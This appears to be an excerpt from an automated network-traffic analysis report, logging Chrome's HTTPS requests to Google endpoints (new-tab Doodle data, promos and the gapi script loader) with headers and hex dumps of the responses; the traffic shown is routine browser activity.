                                                                                                                                                                                                            2024-05-01 09:08:13 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1479INHTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1479INData Raw: 39 33 64 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 6c 74 5f 74 65 78 74 22 3a 22 43 65 6c 65 62 72 61 74 69 6e 67 20 4d 65 65 6e 61 20 41 6c 65 78 61 6e 64 65 72 22 2c 22 64 61 72 6b 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 66 51 41 41 41 44 49 43 41 4d 41 41 41 41 70 78 2b 50 61 41 41 41 44 41 46 42 4d 56 45 56 48 63 45 77 2f 4c 43 6c 66 4d 79 37 6b 32 4e 41 31 4a 79 4d 74 48 42 68 67 53 30 74 5a 51 30 4b 4b 53 55 64 4c 4e 54 55 63 45 42 41 63 45 68 4a 4d 4d 53 30 67 44 51 36 38 72 36 67 64 45 52 46 70 55 46 4e 43 4e 7a 49 63 45 78 4c 56 78 72 2b 49 66 6e 39 74 4d 69 32 45 65 33 7a 67 31 73 33 58 79
                                                                                                                                                                                                            Data Ascii: 93d)]}'{"ddljson":{"alt_text":"Celebrating Meena Alexander","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAADICAMAAAApx+PaAAADAFBMVEVHcEw/LClfMy7k2NA1JyMtHBhgS0tZQ0KKSUdLNTUcEBAcEhJMMS0gDQ68r6gdERFpUFNCNzIcExLVxr+Ifn9tMi2Ee3zg1s3Xy
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC893INData Raw: 44 6d 58 38 73 74 58 50 79 72 67 56 6b 45 6f 61 34 5a 65 6f 37 2b 72 5a 57 32 6b 38 4e 79 67 78 56 6c 49 32 72 71 71 62 6f 42 61 43 79 62 43 4d 58 49 34 4a 38 66 67 46 47 4d 4b 4d 5a 31 52 68 48 4e 49 69 64 4d 51 32 33 47 49 37 66 4b 4a 67 30 2b 49 71 4b 71 70 39 4e 4a 54 7a 39 53 62 69 51 6f 49 4b 73 4a 71 6a 45 52 46 6a 63 77 4a 49 75 54 6a 46 48 2f 41 79 56 53 35 52 78 30 43 45 77 73 68 53 51 4f 6b 68 32 57 35 4f 68 43 65 37 39 66 72 44 62 62 63 37 67 6a 4c 64 52 6d 47 5a 6d 6a 30 56 69 39 2b 41 32 66 73 30 75 4b 71 78 45 42 49 44 57 68 74 44 6e 49 6b 79 50 6e 53 4d 6f 71 4d 34 77 68 2f 78 54 52 4e 54 2b 4e 30 36 63 31 58 4d 6a 48 2f 72 7a 5a 65 4c 68 65 34 68 77 6b 38 2b 70 7a 34 78 62 6d 53 50 6e 69 45 73 74 66 36 51 6d 6b 5a 76 44 5a 75 52 47 47 38
                                                                                                                                                                                                            Data Ascii: DmX8stXPyrgVkEoa4Zeo7+rZW2k8NygxVlI2rqqboBaCybCMXI4J8fgFGMKMZ1RhHNIidMQ23GI7fKJg0+IqKqp9NJTz9SbiQoIKsJqjERFjcwJIuTjFH/AyVS5Rx0CEwshSQOkh2W5OhCe79frDbbc7gjLdRmGZmj0Vi9+A2fs0uKqxEBIDWhtDnIkyPnSMoqM4wh/xTRNT+N06c1XMjH/rzZeLhe4hwk8+pz4xbmSPniEstf6QmkZvDZuRGG8
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 35 35 33 61 0d 0a 36 71 30 44 4a 58 5a 42 63 5a 43 4b 54 38 2f 42 43 6a 4a 61 66 2f 4c 72 56 37 2b 66 51 6b 68 51 68 6f 45 39 65 77 39 47 6c 43 73 56 6f 54 4c 55 52 55 56 42 4a 50 61 67 31 78 74 30 42 34 4e 42 62 33 43 43 37 50 44 77 45 4b 72 50 7a 74 32 62 6e 5a 6b 69 2b 74 32 4d 73 70 49 31 68 59 59 6d 6d 53 45 55 5a 67 59 7a 36 76 56 39 7a 33 55 36 6e 5a 48 6e 6a 56 49 38 4a 69 59 7a 54 44 64 6a 6b 75 30 76 43 38 70 49 63 34 6e 4a 77 68 31 47 4f 30 79 6b 6a 6f 4e 49 42 34 56 4f 6a 53 53 45 36 6b 36 6e 56 71 74 56 4f 35 67 4a 7a 7a 6d 2f 4f 75 38 62 59 66 2b 6f 45 51 53 58 73 47 62 7a 6d 61 36 52 61 44 65 42 68 44 42 30 53 71 51 43 4b 5a 4a 77 70 43 6c 38 79 2b 4b 57 78 54 45 68 77 6d 58 63 51 68 31 44 6f 50 78 59 75 32 75 52 78 61 57 70 39 45 49 52 79
                                                                                                                                                                                                            Data Ascii: 553a6q0DJXZBcZCKT8/BCjJaf/LrV7+fQkhQhoE9ew9GlCsVoTLURUVBJPag1xt0B4NBb3CC7PDwEKrPzt2bnZki+t2MspI1hYYmmSEUZgYz6vV9z3U6nZHnjVI8JiYzTDdjku0vC8pIc4nJwh1GO0ykjoNIB4VOjSSE6k6nVqtVO5gJzzm/Ou8bYf+oEQSXsGbzma6RaDeBhDB0SqQCKZJwpCl8y+KWxTEhwmXcQh1DoPxYu2uRxaWp9EIRy
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 79 54 53 58 4e 73 50 52 5a 70 4a 6b 58 37 53 42 56 37 51 6a 51 2b 78 73 54 4d 6f 55 69 78 4b 56 57 30 74 64 67 68 6c 2f 33 52 2f 74 4b 34 4f 32 42 71 6a 7a 52 63 75 7a 55 34 76 54 38 2f 32 31 78 62 54 67 50 4f 4e 48 59 32 44 67 39 45 6f 68 31 70 4e 44 30 46 52 4c 74 53 73 35 42 74 32 33 45 55 31 53 49 70 32 64 45 51 37 6f 74 45 4f 33 47 6e 73 69 46 5a 2f 66 6e 67 57 31 4d 2f 32 56 6c 63 50 56 6c 64 58 4e 7a 5a 57 4e 36 49 36 54 38 4a 5a 74 44 6b 61 73 65 4d 50 6b 75 7a 32 32 56 6b 37 62 58 5a 37 76 37 30 2f 45 70 46 46 76 79 4a 59 4c 65 76 72 67 59 62 41 65 6b 4e 41 45 46 75 48 57 36 2b 4c 69 69 49 4b 43 69 56 4d 79 57 51 73 47 62 4d 31 65 65 66 75 33 35 2b 62 6d 35 72 36 64 47 72 71 2f 6c 78 2f 39 66 6e 71 38 79 4d 74 68 2f 56 7a 57 30 76 66 72 46 77 72
                                                                                                                                                                                                            Data Ascii: yTSXNsPRZpJkX7SBV7QjQ+xsTMoUixKVW0tdghl/3R/tK4O2BqjzRcuzU4vT8/21xbTgPONHY2Dg9Eoh1pND0FRLtSs5Bt23EU1SIp2dEQ7otEO3GnsiFZ/fngW1M/2VlcPVldXNzZWN6I6T8JZtDkaseMPkuz22Vk7bXZ7v70/EpFFvyJYLevrgYbAekNAEFuHW6+LiiIKCiVMyWQsGbM1eefu35+bm5r6dGrq/lx/9fnq8yMth/VzW0vfrFwr
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 51 56 54 4f 32 6a 4f 7a 76 65 63 34 39 45 45 59 48 57 6a 48 2b 6c 5a 52 4f 70 6c 51 6a 7a 6d 42 33 52 37 2f 4d 32 4d 64 58 39 58 74 45 73 67 37 39 63 79 36 30 42 64 4c 57 6c 31 44 44 73 71 6e 79 54 46 4a 4d 79 7a 6a 53 75 66 54 61 51 66 4a 46 56 5a 6c 6d 31 66 47 75 51 76 6a 72 52 58 39 77 70 4a 2f 32 4e 59 46 6c 7a 78 38 30 72 6e 7a 38 67 6a 36 4c 7a 2f 34 47 5a 61 33 33 67 4c 39 46 77 53 6b 47 4d 72 4a 32 34 34 68 4d 42 34 69 36 46 59 4f 48 77 65 59 42 34 2f 45 78 2b 72 67 64 36 79 5a 64 31 45 55 68 2b 31 53 50 67 2b 78 69 78 41 4e 44 4a 79 36 68 66 63 78 6c 6a 4f 61 38 62 4e 6f 76 69 62 4c 61 5a 65 56 51 57 39 71 75 74 72 6b 77 75 31 6e 4c 4c 70 33 37 74 79 75 4a 75 42 30 31 45 78 39 65 70 38 67 77 2b 69 45 4f 56 36 45 7a 75 6a 44 38 56 54 70 47 71 43
                                                                                                                                                                                                            Data Ascii: QVTO2jOzvec49EEYHWjH+lZROplQjzmB3R7/M2MdX9XtEsg79cy60BdLWl1DDsqnyTFJMyzjSufTaQfJFVZlm1fGuQvjrRX9wpJ/2NYFlzx80rnz8gj6Lz/4GZa33gL9FwSkGMrJ244hMB4i6FYOHweYB4/Ex+rgd6yZd1EUh+1SPg+xixANDJy6hfcxljOa8bNovibLaZeVQW9qutrkwu1nLLp37tyuJuB01Ex9ep8gw+iEOV6EzujD8VTpGqC
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 2b 74 78 66 51 43 2f 6d 72 44 48 70 6e 56 31 76 4a 36 5a 69 2f 77 69 36 31 55 31 4e 46 36 49 42 5a 68 4c 37 36 2f 41 43 30 47 58 57 63 77 66 53 4d 4d 6b 58 79 4f 46 4d 75 74 5a 2b 61 58 4b 5a 35 55 50 2b 79 33 68 67 79 47 55 34 2f 79 50 59 59 54 34 51 47 51 36 64 50 6d 4f 44 71 43 6e 41 75 4b 7a 76 42 56 46 61 47 70 71 48 43 68 4a 35 67 4d 6c 51 59 6a 63 5a 42 79 74 46 67 34 62 39 49 6e 6f 6d 4d 70 4c 46 67 44 72 6f 45 6d 2b 47 6d 75 33 58 53 63 4d 50 47 41 6f 57 44 49 6e 53 4e 64 6b 37 66 53 64 44 4a 36 71 63 6f 6b 64 4d 30 6b 4e 58 74 47 4d 68 31 38 72 76 7a 34 49 42 53 4e 30 41 76 69 5a 44 6a 75 6e 52 2f 58 51 69 72 57 4d 42 4f 4b 6f 49 59 43 4d 4c 4b 59 54 6e 73 62 5a 4a 6c 76 7a 38 63 56 6d 4e 67 37 68 4e 46 31 53 73 4b 49 6b 79 75 2b 6f 52 68 55 56
                                                                                                                                                                                                            Data Ascii: +txfQC/mrDHpnV1vJ6Zi/wi61U1NF6IBZhL76/AC0GXWcwfSMMkXyOFMutZ+aXKZ5UP+y3hgyGU4/yPYYT4QGQ6dPmODqCnAuKzvBVFaGpqHChJ5gMlQYjcZBytFg4b9InomMpLFgDroEm+Gmu3XScMPGAoWDInSNdk7fSdDJ6qcokdM0kNXtGMh18rvz4IBSN0AviZDjunR/XQirWMBOKoIYCMLKYTnsbZJlvz8cVmNg7hNF1SsKIkyu+oRhUV
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 39 35 41 42 31 70 76 63 53 63 72 6e 48 65 58 42 4b 61 79 39 46 32 35 76 54 4b 2f 36 67 75 51 76 2b 66 4f 4c 41 36 75 5a 6a 66 71 57 44 53 4e 4e 62 45 38 61 65 70 64 55 45 55 52 66 41 57 59 32 46 42 68 4a 2b 62 62 42 6a 56 62 62 5a 77 32 4b 2f 4b 74 43 43 48 6d 36 71 71 68 6f 63 56 76 38 71 57 36 4a 52 68 56 57 6e 36 61 4f 33 78 62 78 2f 58 50 46 77 62 4c 38 7a 76 55 48 6a 2f 7a 32 74 2f 49 4f 68 2f 65 37 7a 54 66 31 57 43 37 71 59 34 79 35 41 7a 36 48 41 36 75 7a 72 2f 79 6f 63 46 6f 41 44 54 75 6f 38 61 44 59 4b 56 43 41 45 32 48 61 79 4e 41 7a 58 4b 49 76 51 67 55 42 63 46 2f 42 54 71 45 54 47 41 6d 34 5a 30 78 77 75 48 69 31 72 6f 4a 6f 42 4f 53 75 49 77 4a 37 48 5a 41 4e 32 61 6e 33 63 34 67 6f 36 6e 63 33 4f 4a 78 48 62 6e 79 39 73 74 5a 2f 44 43 68
                                                                                                                                                                                                            Data Ascii: 95AB1pvcScrnHeXBKay9F25vTK/6guQv+fOLA6uZjfqWDSNNbE8aepdUEURfAWY2FBhJ+bbBjVbbZw2K/KtCCHm6qqhocVv8qW6JRhVWn6aO3xbx/XPFwbL8zvUHj/z2t/IOh/e7zTf1WC7qY4y5Az6HA6uzr/yocFoADTuo8aDYKVCAE2HayNAzXKIvQgUBcF/BTqETGAm4Z0xwuHi1roJoBOSuIwJ7HZAN2an3c4go6nc3OJxHbny9stZ/DCh
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 49 64 75 54 63 2b 4c 35 50 51 66 41 4f 64 6e 32 50 2b 66 73 76 76 5a 51 44 61 62 48 64 37 59 33 45 78 4e 54 4b 68 49 35 61 30 38 4d 7a 43 37 30 75 4d 79 68 78 37 30 44 37 31 4b 44 33 47 39 6f 72 38 4c 75 4e 6c 47 72 31 2f 48 6c 32 77 71 6f 41 2b 5a 58 54 76 33 76 76 6a 69 33 72 31 37 69 63 51 49 58 6e 62 33 6c 71 41 6a 6f 75 73 61 6e 36 52 70 32 73 49 43 72 4a 33 52 4e 57 62 79 68 63 6e 4a 79 64 78 6b 61 70 4f 53 39 2f 32 4e 2b 31 65 6d 61 2b 75 6e 5a 77 66 4b 71 6b 4b 68 43 6a 41 45 5a 79 35 75 65 54 6a 66 43 43 48 55 45 33 64 41 2f 32 74 68 78 6b 37 45 4b 65 32 44 7a 78 48 66 2b 56 6f 38 62 53 53 63 74 52 74 50 52 6a 52 41 5a 2b 73 79 4a 61 65 6a 31 4f 42 70 73 4a 65 51 76 64 4f 62 56 62 77 36 37 32 32 30 59 78 72 50 78 47 4d 35 68 36 36 58 6d 44 50 6f
                                                                                                                                                                                                            Data Ascii: IduTc+L5PQfAOdn2P+fsvvZQDabHd7Y3ExNTKhI5a08MzC70uMyhx70D71KD3G9or8LuNlGr1/Hl2wqoA+ZXTv3vvji3r17icQIXnb3lqAjousan6Rp2sICrJ3RNWbyhcnJydxkapOS9/2N+1ema+unZwfKqkKhCjAEZy5ueTjfCCHUE3dA/2thxk7EKe2DzxHf+Vo8bSSctRtPRjRAZ+syJaej1OBpsJeQvdObVbw67220YxrPxGM5h66XmDPo
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 69 70 58 59 66 46 4e 54 55 39 70 71 39 69 4f 38 44 38 6e 71 30 41 70 73 6a 71 38 6f 56 68 49 31 68 77 78 36 4c 34 4f 65 79 59 7a 78 46 32 75 59 6e 6b 33 65 38 58 71 37 4a 79 61 36 62 79 33 69 38 35 4a 59 4d 6f 59 6a 32 62 63 35 75 72 6d 68 58 4b 71 76 66 68 33 43 53 46 35 68 6f 45 6b 34 6b 4a 6b 4d 78 4c 36 45 76 49 7a 4a 41 41 4f 33 44 37 53 48 55 46 57 64 4f 45 62 6f 44 4c 68 44 30 45 45 64 43 67 30 67 6c 47 73 53 6b 36 64 6e 4d 42 54 36 74 39 44 45 77 4f 38 6c 50 69 6c 48 77 55 6f 53 30 4e 4a 70 52 4d 38 51 39 46 50 59 65 77 66 35 67 4d 41 65 70 70 75 6c 49 59 49 36 4d 4f 44 72 73 7a 70 33 50 31 37 72 4f 65 33 54 49 41 34 46 4d 54 76 44 6d 4a 33 30 71 77 58 76 75 4d 33 6d 6c 52 64 70 50 64 61 66 70 46 56 52 58 4d 52 30 44 53 74 78 69 6b 69 72 4e 59 49
                                                                                                                                                                                                            Data Ascii: ipXYfFNTU9pq9iO8D8nq0Apsjq8oVhI1hwx6L4OeyYzxF2uYnk3e8Xq7Jya6by3i85JYMoYj2bc5urmhXKqvfh3CSF5hoEk4kJkMxL6EvIzJAAO3D7SHUFWdOEboDLhD0EEdCg0glGsSk6dnMBT6t9DEwO8lPilHwUoS0NJpRM8Q9FPYewf5gMAeppulIYI6MODrszp3P17rOe3TIA4FMTvDmJ30qwXvuM3mlRdpPdafpFVRXMR0DStxikirNYI
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 5a 68 67 31 4e 67 46 59 4a 5a 50 2f 50 2b 39 72 41 72 4a 6a 6e 32 4d 66 48 42 6f 7a 45 7a 2f 2f 6e 36 33 31 65 34 68 4e 78 55 49 39 30 44 73 59 37 38 65 66 75 62 48 5a 61 4a 48 32 5a 58 74 64 64 6f 39 4b 56 6c 74 55 49 61 6b 6b 33 4d 43 41 71 39 53 72 4a 71 4a 68 47 33 65 61 50 41 33 6f 6b 6f 6f 5a 37 56 32 74 4f 65 66 4c 79 54 68 59 66 50 34 4b 35 7a 75 4d 6e 34 64 65 68 37 74 50 76 77 2b 36 39 66 36 38 51 52 6c 4f 72 47 37 6a 6a 64 48 78 6f 74 41 6f 42 4b 6a 53 63 67 6e 34 54 78 7a 63 58 43 70 6e 53 4e 31 38 64 75 41 66 6f 59 37 66 75 6f 6b 7a 72 67 73 77 64 45 44 6b 42 78 33 33 53 50 70 6d 32 6d 47 6c 69 2b 52 53 49 4e 44 54 6b 5a 68 42 7a 6b 43 58 4c 2b 50 2f 51 38 53 53 54 4b 6a 46 38 4a 7a 4c 30 74 4f 50 66 57 62 7a 78 62 35 43 6c 6a 49 53 65 73 58
                                                                                                                                                                                                            Data Ascii: Zhg1NgFYJZP/P+9rArJjn2MfHBozEz//n631e4hNxUI90DsY78efubHZaJH2ZXtddo9KVltUIakk3MCAq9SrJqJhG3eaPA3okooZ7V2tOefLyThYfP4K5zuMn4deh7tPvw+69f68QRlOrG7jjdHxotAoBKjScgn4TxzcXCpnSN18duAfoY7fuokzrgswdEDkBx33SPpm2mGli+RSINDTkZhBzkCXL+P/Q8SSTKjF8JzL0tOPfWbzxb5CljISesX


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.449735142.251.16.1474438000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1434INHTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.449745172.253.122.1014438000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                            Host: apis.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                            Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                            Content-Length: 121628
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: sffe
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 13:03:57 GMT
                                                                                                                                                                                                            Expires: Sat, 26 Apr 2025 13:03:57 GMT
                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                            Last-Modified: Mon, 15 Apr 2024 17:34:54 GMT
                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Age: 417861
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC339INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 32 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 63 61 2c 64 61 2c 6e 61 2c 70 61 2c 76 61 2c 77 61 2c 7a 61 3b 62 61 3d 66 75 6e 63
                                                                                                                                                                                                            Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x20000, ]);var ba,ca,da,na,pa,va,wa,za;ba=func
